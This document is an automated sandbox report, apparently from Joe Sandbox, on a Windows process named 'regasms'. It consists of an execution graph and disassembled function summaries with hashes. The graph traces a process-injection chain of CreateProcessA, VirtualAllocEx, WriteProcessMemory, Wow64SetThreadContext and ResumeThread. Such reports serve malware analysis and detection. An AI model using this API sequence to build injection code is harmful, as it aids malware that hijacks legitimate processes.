                                  execution_graph 46401 2f84668 46402 2f8467a 46401->46402 46403 2f84686 46402->46403 46405 2f84778 46402->46405 46406 2f8479d 46405->46406 46410 2f84888 46406->46410 46414 2f84878 46406->46414 46412 2f848af 46410->46412 46411 2f8498c 46412->46411 46418 2f844b4 46412->46418 46415 2f848af 46414->46415 46416 2f8498c 46415->46416 46417 2f844b4 CreateActCtxA 46415->46417 46417->46416 46419 2f85918 CreateActCtxA 46418->46419 46421 2f859db 46419->46421 46422 2f8b218 46425 2f8b300 46422->46425 46423 2f8b227 46426 2f8b321 46425->46426 46427 2f8b344 46425->46427 46426->46427 46428 2f8b548 GetModuleHandleW 46426->46428 46427->46423 46429 2f8b575 46428->46429 46429->46423 46435 2f8d7c8 DuplicateHandle 46436 2f8d85e 46435->46436 46430 7dd60ff 46431 7dd6102 46430->46431 46432 7dd608b 46430->46432 46431->46432 46433 7dd7f84 12 API calls 46431->46433 46434 7dd7f80 12 API calls 46431->46434 46433->46432 46434->46432 46233 7dd61d5 46234 7dd6104 46233->46234 46235 7dd61db 46233->46235 46234->46235 46238 7dd7f84 46234->46238 46257 7dd7f80 46234->46257 46239 7dd7f9a 46238->46239 46250 7dd7fa2 46239->46250 46276 7dd855c 46239->46276 46281 7dd85a2 46239->46281 46286 7dd8803 46239->46286 46290 7dd83e1 46239->46290 46295 7dd8501 46239->46295 46299 7dd8886 46239->46299 46304 7dd88e7 46239->46304 46309 7dd8584 46239->46309 46314 7dd83af 46239->46314 46319 7dd89cf 46239->46319 46324 7dd888c 46239->46324 46328 7dd866c 46239->46328 46333 7dd84cd 46239->46333 46338 7dd89f6 46239->46338 46343 7dd8b17 46239->46343 46348 7dd8379 46239->46348 46250->46235 46258 7dd7f9a 46257->46258 46259 7dd855c 2 API calls 46258->46259 46260 7dd8379 2 API calls 46258->46260 46261 7dd8b17 2 API calls 46258->46261 46262 7dd89f6 2 API calls 46258->46262 46263 7dd84cd 2 API calls 46258->46263 46264 7dd866c 2 API calls 46258->46264 46265 7dd888c 2 API calls 46258->46265 46266 7dd89cf 2 API calls 46258->46266 46267 7dd83af 2 API calls 46258->46267 46268 7dd8584 2 API calls 46258->46268 46269 7dd7fa2 46258->46269 46270 7dd88e7 2 API calls 46258->46270 46271 7dd8886 2 API calls 46258->46271 46272 7dd8501 2 API calls 46258->46272 46273 7dd83e1 2 API calls 46258->46273 46274 7dd8803 2 API calls 46258->46274 46275 7dd85a2 2 API calls 46258->46275 46259->46269 46260->46269 46261->46269 46262->46269 46263->46269 46264->46269 46265->46269 46266->46269 46267->46269 46268->46269 46269->46235 46270->46269 46271->46269 46272->46269 46273->46269 46274->46269 46275->46269 46277 7dd85d6 46276->46277 46278 7dd856b 46276->46278 46353 7dd5998 46277->46353 46357 7dd59a0 46277->46357 46278->46250 46282 7dd85a8 46281->46282 46283 7dd85df 46282->46283 46361 7dd5b48 46282->46361 46365 7dd5b50 46282->46365 46283->46250 46369 7dd5a59 46286->46369 46373 7dd5a60 46286->46373 46287 7dd8831 46287->46250 46292 7dd838d 46290->46292 46291 7dd83a9 46291->46250 46292->46291 46377 7dd5cdc 46292->46377 46381 7dd5ce8 46292->46381 46297 7dd5a59 WriteProcessMemory 46295->46297 46298 7dd5a60 WriteProcessMemory 46295->46298 46296 7dd84b8 46297->46296 46298->46296 46300 7dd8a3f 46299->46300 46385 7dd58c8 46300->46385 46389 7dd58c0 46300->46389 46301 7dd8a5a 46305 7dd859b 46304->46305 46393 7dd5818 46305->46393 46397 7dd5811 46305->46397 46306 7dd856b 46306->46250 46310 7dd858a 46309->46310 46312 7dd5818 ResumeThread 46310->46312 46313 7dd5811 ResumeThread 46310->46313 46311 7dd856b 46311->46250 46312->46311 46313->46311 46315 7dd838d 46314->46315 46316 7dd83a9 46314->46316 46315->46316 46317 7dd5cdc CreateProcessA 46315->46317 46318 7dd5ce8 CreateProcessA 46315->46318 46316->46250 46317->46316 46318->46316 46320 7dd89dc 46319->46320 46322 7dd5818 ResumeThread 46320->46322 46323 7dd5811 ResumeThread 46320->46323 46321 7dd856b 46321->46250 46322->46321 46323->46321 46326 7dd58c8 Wow64SetThreadContext 46324->46326 46327 7dd58c0 Wow64SetThreadContext 46324->46327 46325 7dd88a6 46325->46250 46326->46325 46327->46325 46329 7dd862b 46328->46329 46330 7dd85df 46328->46330 46331 7dd5b48 ReadProcessMemory 46329->46331 46332 7dd5b50 ReadProcessMemory 46329->46332 46330->46250 46331->46330 46332->46330 46335 7dd84dd 46333->46335 46334 7dd8b53 46336 7dd5a59 WriteProcessMemory 46335->46336 46337 7dd5a60 WriteProcessMemory 46335->46337 46336->46334 46337->46334 46339 7dd85b9 46338->46339 46340 7dd85df 46339->46340 46341 7dd5b48 ReadProcessMemory 46339->46341 46342 7dd5b50 ReadProcessMemory 46339->46342 46340->46250 46341->46340 46342->46340 46344 7dd8b1b 46343->46344 46346 7dd5a59 WriteProcessMemory 46344->46346 46347 7dd5a60 WriteProcessMemory 46344->46347 46345 7dd8b53 46346->46345 46347->46345 46350 7dd838c 46348->46350 46349 7dd83a9 46349->46250 46350->46349 46351 7dd5cdc CreateProcessA 46350->46351 46352 7dd5ce8 CreateProcessA 46350->46352 46351->46349 46352->46349 46354 7dd59a0 VirtualAllocEx 46353->46354 46356 7dd5a1d 46354->46356 46356->46278 46358 7dd59e0 VirtualAllocEx 46357->46358 46360 7dd5a1d 46358->46360 46360->46278 46362 7dd5b51 ReadProcessMemory 46361->46362 46364 7dd5bdf 46362->46364 46364->46283 46366 7dd5b9b ReadProcessMemory 46365->46366 46368 7dd5bdf 46366->46368 46368->46283 46370 7dd5a60 WriteProcessMemory 46369->46370 46372 7dd5aff 46370->46372 46372->46287 46374 7dd5aa8 WriteProcessMemory 46373->46374 46376 7dd5aff 46374->46376 46376->46287 46378 7dd5ce8 CreateProcessA 46377->46378 46380 7dd5f33 46378->46380 46382 7dd5d71 CreateProcessA 46381->46382 46384 7dd5f33 46382->46384 46386 7dd590d Wow64SetThreadContext 46385->46386 46388 7dd5955 46386->46388 46388->46301 46390 7dd58c5 Wow64SetThreadContext 46389->46390 46392 7dd5955 46390->46392 46392->46301 46394 7dd5858 ResumeThread 46393->46394 46396 7dd5889 46394->46396 46396->46306 46398 7dd5818 ResumeThread 46397->46398 46400 7dd5889 46398->46400 46400->46306 46437 2f8d580 46438 2f8d585 GetCurrentProcess 46437->46438 46440 2f8d618 GetCurrentThread 46438->46440 46441 2f8d611 46438->46441 46442 2f8d64e 46440->46442 46443 2f8d655 GetCurrentProcess 46440->46443 46441->46440 46442->46443 46446 2f8d68b 46443->46446 46444 2f8d6b3 GetCurrentThreadId 46445 2f8d6e4 46444->46445 46446->46444 46447 7b177c8 46448 7b177e0 46447->46448 46449 7b1786d 46448->46449 46451 7dd9068 46448->46451 46452 7dd9045 46451->46452 46454 7dd906b 46451->46454 46452->46449 46454->46452 46455 7dd26d4 46454->46455 46456 7dd9320 PostMessageW 46455->46456 46457 7dd938c 46456->46457 46457->46454

                                  Executed Functions

                                  Function 02F8D570 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1296 2f8d570-2f8d57e 1297 2f8d580-2f8d584 1296->1297 1298 2f8d585-2f8d60f GetCurrentProcess 1296->1298 1297->1298 1302 2f8d618-2f8d64c GetCurrentThread 1298->1302 1303 2f8d611-2f8d617 1298->1303 1304 2f8d64e-2f8d654 1302->1304 1305 2f8d655-2f8d689 GetCurrentProcess 1302->1305 1303->1302 1304->1305 1307 2f8d68b-2f8d691 1305->1307 1308 2f8d692-2f8d6ad call 2f8d75a 1305->1308 1307->1308 1311 2f8d6b3-2f8d6e2 GetCurrentThreadId 1308->1311 1312 2f8d6eb-2f8d74d 1311->1312 1313 2f8d6e4-2f8d6ea 1311->1313 1313->1312
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D5FE
                                  • GetCurrentThread.KERNEL32 ref: 02F8D63B
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D678
                                  • GetCurrentThreadId.KERNEL32 ref: 02F8D6D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 01b46fff131daa781729997962046e985545077ac05969364d6a115a37263e3e
                                  • Instruction ID: d7ce1b3f2bda852aedd94c53f83c00b27f3c438c33ba48e2167e08a5e97b0048
                                  • Opcode Fuzzy Hash: 01b46fff131daa781729997962046e985545077ac05969364d6a115a37263e3e
                                  • Instruction Fuzzy Hash: 605144B0D00249CFEB15DFA9D648BAEFBF1EF48344F24845AE109AB2A1D7345944CB66
                                  Function 02F8D580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1320 2f8d580-2f8d60f GetCurrentProcess 1325 2f8d618-2f8d64c GetCurrentThread 1320->1325 1326 2f8d611-2f8d617 1320->1326 1327 2f8d64e-2f8d654 1325->1327 1328 2f8d655-2f8d689 GetCurrentProcess 1325->1328 1326->1325 1327->1328 1330 2f8d68b-2f8d691 1328->1330 1331 2f8d692-2f8d6ad call 2f8d75a 1328->1331 1330->1331 1334 2f8d6b3-2f8d6e2 GetCurrentThreadId 1331->1334 1335 2f8d6eb-2f8d74d 1334->1335 1336 2f8d6e4-2f8d6ea 1334->1336 1336->1335
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D5FE
                                  • GetCurrentThread.KERNEL32 ref: 02F8D63B
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D678
                                  • GetCurrentThreadId.KERNEL32 ref: 02F8D6D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 705302f63920e26bc3aedb7e04f7345bd7e4eb2b918a107a280fa09b549433fc
                                  • Instruction ID: b351924f85884c3a0b71bd2d3f9a9373034321f79224a3783587a3b88e55b1f5
                                  • Opcode Fuzzy Hash: 705302f63920e26bc3aedb7e04f7345bd7e4eb2b918a107a280fa09b549433fc
                                  • Instruction Fuzzy Hash: 8D5122B0D00209CFEB14DFA9D648BAEFBF1EF48344F248459E119AB2A0D7745944CB66
                                  Function 07B16C81 Relevance: 5.4, Strings: 4, Instructions: 352COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1343 7b16c81-7b16f48 1345 7b16f4f-7b16f52 1343->1345 1346 7b16f58-7b16f60 1345->1346 1347 7b1731c-7b17335 1345->1347 1348 7b16f62-7b16f69 1346->1348 1349 7b16f6b-7b16f6d 1346->1349 1353 7b17338-7b1733c 1347->1353 1354 7b1733e-7b17351 call 7b16e88 1347->1354 1350 7b16fa1-7b16fd5 1348->1350 1351 7b16f72-7b16f7a 1349->1351 1364 7b16fd7-7b16fdd 1350->1364 1365 7b16fed-7b17014 1350->1365 1351->1347 1355 7b16f80-7b16f87 1351->1355 1353->1354 1358 7b16f92-7b16f96 1355->1358 1359 7b16f89-7b16f90 1355->1359 1358->1351 1360 7b16f98-7b16f9f 1358->1360 1359->1360 1360->1345 1360->1350 1367 7b16fe1-7b16fe3 1364->1367 1368 7b16fdf 1364->1368 1371 7b17016-7b1702b 1365->1371 1372 7b1703a-7b17079 1365->1372 1367->1365 1368->1365 1377 7b172b7-7b172e2 1371->1377 1381 7b170a3-7b17120 1372->1381 1382 7b1707b-7b17081 1372->1382 1387 7b172e4-7b172eb 1377->1387 1388 7b17317 1377->1388 1396 7b17122-7b17148 1381->1396 1397 7b1714e-7b17151 1381->1397 1382->1347 1385 7b17087-7b170a1 1382->1385 1385->1381 1385->1382 1396->1397 1398 7b17153-7b17179 1397->1398 1399 7b1717f-7b17182 1397->1399 1398->1399 1400 7b171b0-7b171b3 1399->1400 1401 7b17184-7b171aa 1399->1401 1402 7b171b5-7b171ba 1400->1402 1403 7b171ef-7b1721f 1400->1403 1401->1400 1404 7b171eb-7b171ed 1402->1404 1407 7b17221-7b17236 1403->1407 1408 7b17238-7b17244 1403->1408 1404->1403 1405 7b171bc-7b171ea 1404->1405 1405->1404 1409 7b1724d-7b172a6 1407->1409 1408->1409 1413 7b172ae 1409->1413 1413->1377
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q$F$R$pq
                                  • API String ID: 0-188756743
                                  • Opcode ID: 57380d2770aea1c99ca2a2cc0c7fbeda7c9eb635e4c416cb698229701acb0aea
                                  • Instruction ID: f92af3ee6026dd4228aeab5206852f296d06331974df0c74623c706495e609a0
                                  • Opcode Fuzzy Hash: 57380d2770aea1c99ca2a2cc0c7fbeda7c9eb635e4c416cb698229701acb0aea
                                  • Instruction Fuzzy Hash: E6D1E6B6600104EFDB16CF99C984D59BBB2FF49314B5A80E9E6099F272CB32DC61DB50
                                  Function 07B19260 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1463 7b19260-7b19276 1464 7b19333-7b19342 1463->1464 1466 7b1934d-7b193ae 1464->1466 1481 7b1932a 1466->1481 1483 7b19280 1481->1483 1484 7b19287-7b19331 1481->1484 1483->1464 1483->1484 1485 7b19315-7b19329 1483->1485 1486 7b192b7-7b192d5 1483->1486 1484->1481 1491 7b192d7-7b192da 1486->1491 1492 7b192dc-7b192e9 1486->1492 1493 7b192eb-7b192fa 1491->1493 1492->1493 1496 7b19312 1493->1496 1497 7b192fc-7b19302 1493->1497 1496->1485 1498 7b19304 1497->1498 1499 7b19306-7b19308 1497->1499 1498->1496 1499->1496
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q$8q
                                  • API String ID: 0-3169173723
                                  • Opcode ID: 715585cb1cb576f659a42a692c83a2e8b46082f9cadec658e693d29973a0c34c
                                  • Instruction ID: b0adea6fa72d499c08c26fce07b1e1b56bc1c63e5f2ca372682b28086ab8a399
                                  • Opcode Fuzzy Hash: 715585cb1cb576f659a42a692c83a2e8b46082f9cadec658e693d29973a0c34c
                                  • Instruction Fuzzy Hash: 1531C7F4E142C6DFFB049A94D46557E76B2EBCA200F9040EAD503E73C4DA31AD0287E2
                                  Function 07B1837F Relevance: 3.8, Strings: 3, Instructions: 33COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1523 7b1837f-7b18387 1524 7b18389-7b1851d 1523->1524 1525 7b183db-7b183e2 1523->1525 1535 7b18513 1524->1535 1526 7b183e4-7b183ea 1525->1526 1527 7b183fa-7b18417 1525->1527 1528 7b183ec 1526->1528 1529 7b183ee-7b183f0 1526->1529 1533 7b18582-7b18587 1527->1533 1534 7b1841d-7b18428 1527->1534 1528->1527 1529->1527 1534->1535
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q$$q
                                  • API String ID: 0-3275118826
                                  • Opcode ID: 59695c975cd8f843615a2895e2eadb823130be0c49443f51b7693839f2e18717
                                  • Instruction ID: fc34f4dfcf5cca73a9ef2fae2e52abaf1cf9b0c1082c7348bc4edd369a4d68c6
                                  • Opcode Fuzzy Hash: 59695c975cd8f843615a2895e2eadb823130be0c49443f51b7693839f2e18717
                                  • Instruction Fuzzy Hash: 8EF0B4F0A1420ADFFB744B69A8353BA3671FB15311F4C84B7E903AF243DA24840287A2
                                  Function 07B12AC7 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1537 7b12ac7-7b12ad0 1538 7b12ad2-7b12ae7 1537->1538 1539 7b12aa5-7b12aaa 1537->1539 1540 7b12aef-7b12af1 1538->1540 1541 7b12af3-7b12b08 1540->1541 1542 7b12b0b-7b12b4e 1540->1542 1549 7b12b50-7b12b54 1542->1549 1550 7b12b55-7b12b78 call 7b120d8 1542->1550 1549->1550 1553 7b12c24-7b12c3b 1550->1553 1554 7b12b7e-7b12b80 1550->1554 1564 7b12c41 1553->1564 1565 7b12c3d-7b12c3f 1553->1565 1555 7b12cb0-7b12cee 1554->1555 1556 7b12b86-7b12b91 call 7b122f0 1554->1556 1588 7b12cf0-7b12cf5 1555->1588 1589 7b12cf6-7b12d57 1555->1589 1562 7b12b93-7b12b95 1556->1562 1563 7b12bae-7b12bb2 1556->1563 1566 7b12ba0-7b12bab call 7b116cc 1562->1566 1567 7b12b97-7b12b9e 1562->1567 1568 7b12c11-7b12c1a 1563->1568 1569 7b12bb4-7b12bc8 call 7b12418 1563->1569 1571 7b12c46-7b12c48 1564->1571 1565->1571 1566->1563 1567->1563 1579 7b12bca-7b12bdb call 7b116cc 1569->1579 1580 7b12bde-7b12be2 1569->1580 1575 7b12c4a-7b12c76 1571->1575 1576 7b12c7d-7b12ca9 1571->1576 1575->1576 1576->1555 1579->1580 1584 7b12be4 1580->1584 1585 7b12bea-7b12c03 1580->1585 1584->1585 1592 7b12c05 1585->1592 1593 7b12c0e 1585->1593 1588->1589 1597 7b12d60-7b12d81 1589->1597 1598 7b12d59-7b12d5f 1589->1598 1592->1593 1593->1568 1598->1597
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q$Hq
                                  • API String ID: 0-1154169777
                                  • Opcode ID: 012ebe7227f8cc7ca5a92d959cdbc07e3a97937d79ffe0a594ea48d577018001
                                  • Instruction ID: d5e295e805c3f5e41af46848fe2fe040c46da6c909087546675f4479b20af756
                                  • Opcode Fuzzy Hash: 012ebe7227f8cc7ca5a92d959cdbc07e3a97937d79ffe0a594ea48d577018001
                                  • Instruction Fuzzy Hash: 6871BDB1B002198FEB15DF69D9097EEBBF6FB88210F54846AE505E7340DB389C05CBA5
                                  Function 07B19250 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1603 7b19250-7b1925d 1604 7b192b1 1603->1604 1605 7b1925f-7b19276 1603->1605 1607 7b192b2-7b193ae 1604->1607 1608 7b19333-7b19342 1605->1608 1611 7b1932a 1607->1611 1615 7b1934d-7b193a4 1608->1615 1613 7b19280 1611->1613 1614 7b19287-7b19331 1611->1614 1613->1608 1613->1614 1616 7b19315-7b19329 1613->1616 1617 7b192b7-7b192d5 1613->1617 1614->1611 1615->1607 1625 7b192d7-7b192da 1617->1625 1626 7b192dc-7b192e9 1617->1626 1627 7b192eb-7b192fa 1625->1627 1626->1627 1632 7b19312 1627->1632 1633 7b192fc-7b19302 1627->1633 1632->1616 1635 7b19304 1633->1635 1636 7b19306-7b19308 1633->1636 1635->1632 1636->1632
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q
                                  • API String ID: 0-4291441500
                                  • Opcode ID: c6b3ed905a4536d0878e2da74a5c8a0d4a3a0d18c6f07e722c8541496172854b
                                  • Instruction ID: ddecc09905269fa257380c9b05e8636c6bf0211884f0277dd25be4ed93bb5d3b
                                  • Opcode Fuzzy Hash: c6b3ed905a4536d0878e2da74a5c8a0d4a3a0d18c6f07e722c8541496172854b
                                  • Instruction Fuzzy Hash: 7E31C4F4A182C6DFFB049A54D4755BE7BB1EB8B200F9540DBD503EB381D631690287E2
                                  Function 07B182D0 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1661 7b182d0-7b18335 1677 7b18335 call 7b1839f 1661->1677 1678 7b18335 call 7b1837f 1661->1678 1665 7b1833b-7b1833d 1669 7b182e6-7b182ec 1665->1669 1670 7b182fc-7b1830b 1665->1670 1671 7b182f0-7b182f2 1669->1671 1672 7b182ee 1669->1672 1673 7b1830d-7b1831a 1670->1673 1674 7b1833f-7b18357 1670->1674 1671->1670 1672->1670 1673->1674 1675 7b1831c-7b18332 1673->1675 1677->1665 1678->1665
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q$$q
                                  • API String ID: 0-3126353813
                                  • Opcode ID: b3e6c90320d8b34b9184384e83e10a26b49b75836aa1e2bdbc41e88ff4f3b2f8
                                  • Instruction ID: bc7ec3ab7ddf76dd05747ade45cd50236381e0e0541d0a51e7b028c4afb412ea
                                  • Opcode Fuzzy Hash: b3e6c90320d8b34b9184384e83e10a26b49b75836aa1e2bdbc41e88ff4f3b2f8
                                  • Instruction Fuzzy Hash: CD01F5F0519282CFE3268724D8143657BB1FB03260F8882EBE84ACB142C7358945C7D6
                                  Function 07B1839F Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1679 7b1839f-7b183d7 1681 7b183e0-7b183e2 1679->1681 1682 7b183e4-7b183ea 1681->1682 1683 7b183fa-7b18417 1681->1683 1684 7b183ec 1682->1684 1685 7b183ee-7b183f0 1682->1685 1687 7b18582-7b18587 1683->1687 1688 7b1841d-7b18513 1683->1688 1684->1683 1685->1683
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q
                                  • API String ID: 0-1864139234
                                  • Opcode ID: 3b5a6ec2eb7b6bd2db3575b78d432294ae69a74b2107f81b2ac679c9d7230011
                                  • Instruction ID: 07235160a5fab80dea34a6c82f697e4de402153679f52b8ef6e14568bc5c263f
                                  • Opcode Fuzzy Hash: 3b5a6ec2eb7b6bd2db3575b78d432294ae69a74b2107f81b2ac679c9d7230011
                                  • Instruction Fuzzy Hash: A5F0C8F0750205DBFB208B14DC767A97371FB10714F5C88E2ED06AF682E6A08991C792
                                  Function 07DD5CDC Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1830 7dd5cdc-7dd5d7d 1833 7dd5d7f-7dd5d89 1830->1833 1834 7dd5db6-7dd5dd6 1830->1834 1833->1834 1835 7dd5d8b-7dd5d8d 1833->1835 1839 7dd5e0f-7dd5e3e 1834->1839 1840 7dd5dd8-7dd5de2 1834->1840 1836 7dd5d8f-7dd5d99 1835->1836 1837 7dd5db0-7dd5db3 1835->1837 1841 7dd5d9d-7dd5dac 1836->1841 1842 7dd5d9b 1836->1842 1837->1834 1850 7dd5e77-7dd5f31 CreateProcessA 1839->1850 1851 7dd5e40-7dd5e4a 1839->1851 1840->1839 1843 7dd5de4-7dd5de6 1840->1843 1841->1841 1844 7dd5dae 1841->1844 1842->1841 1845 7dd5e09-7dd5e0c 1843->1845 1846 7dd5de8-7dd5df2 1843->1846 1844->1837 1845->1839 1848 7dd5df4 1846->1848 1849 7dd5df6-7dd5e05 1846->1849 1848->1849 1849->1849 1852 7dd5e07 1849->1852 1862 7dd5f3a-7dd5fc0 1850->1862 1863 7dd5f33-7dd5f39 1850->1863 1851->1850 1853 7dd5e4c-7dd5e4e 1851->1853 1852->1845 1855 7dd5e71-7dd5e74 1853->1855 1856 7dd5e50-7dd5e5a 1853->1856 1855->1850 1857 7dd5e5c 1856->1857 1858 7dd5e5e-7dd5e6d 1856->1858 1857->1858 1858->1858 1860 7dd5e6f 1858->1860 1860->1855 1873 7dd5fd0-7dd5fd4 1862->1873 1874 7dd5fc2-7dd5fc6 1862->1874 1863->1862 1876 7dd5fe4-7dd5fe8 1873->1876 1877 7dd5fd6-7dd5fda 1873->1877 1874->1873 1875 7dd5fc8 1874->1875 1875->1873 1879 7dd5ff8-7dd5ffc 1876->1879 1880 7dd5fea-7dd5fee 1876->1880 1877->1876 1878 7dd5fdc 1877->1878 1878->1876 1882 7dd600e-7dd6015 1879->1882 1883 7dd5ffe-7dd6004 1879->1883 1880->1879 1881 7dd5ff0 1880->1881 1881->1879 1884 7dd602c 1882->1884 1885 7dd6017-7dd6026 1882->1885 1883->1882 1887 7dd602d 1884->1887 1885->1884 1887->1887
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DD5F1E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 7c71fb0cca8e95bbcbfb2e2148f0813ce6ae93272bb85d373a6f58dc44b7be56
                                  • Instruction ID: 166cfa1f18632079263f8afbaf7d72f813a1c0c69ee1bf640f2e8b2f2cab6ecf
                                  • Opcode Fuzzy Hash: 7c71fb0cca8e95bbcbfb2e2148f0813ce6ae93272bb85d373a6f58dc44b7be56
                                  • Instruction Fuzzy Hash: DAA15BB1D00219CFEB14DF68D844BEDFBB2BF48310F14816AE819A7240DB749995CF91
                                  Function 07DD5CE8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DD5F1E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 2e87c8f4bea383fef8c3d238a8586eca8c21b46be19788d0982a252bc7cd5636
                                  • Instruction ID: 57e6e235412fcc1332cc34718a57a743c10b309d66dc748685b15694a930103b
                                  • Opcode Fuzzy Hash: 2e87c8f4bea383fef8c3d238a8586eca8c21b46be19788d0982a252bc7cd5636
                                  • Instruction Fuzzy Hash: 03914BB1D00219CFEB24DF68D844BEDFBB2AF48314F1485AAE819A7240DB749995CF91
                                  Function 02F8B300 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02F8B566
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 9ffe89c2234d8f32be37fdd3a8b99a9886ffe253005311d87e5d9c43263e4cd2
                                  • Instruction ID: 51c38c0881d7ca3de9c8195c69a925d88e2426b77ba005f55425056643a0a4ef
                                  • Opcode Fuzzy Hash: 9ffe89c2234d8f32be37fdd3a8b99a9886ffe253005311d87e5d9c43263e4cd2
                                  • Instruction Fuzzy Hash: 31813370A00B058FDB25DF2AD55579ABBF1FF88248F00892ED186DBB50E735E849CB91
                                  Function 02F8590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 02F859C9
                                  Memory Dump Source
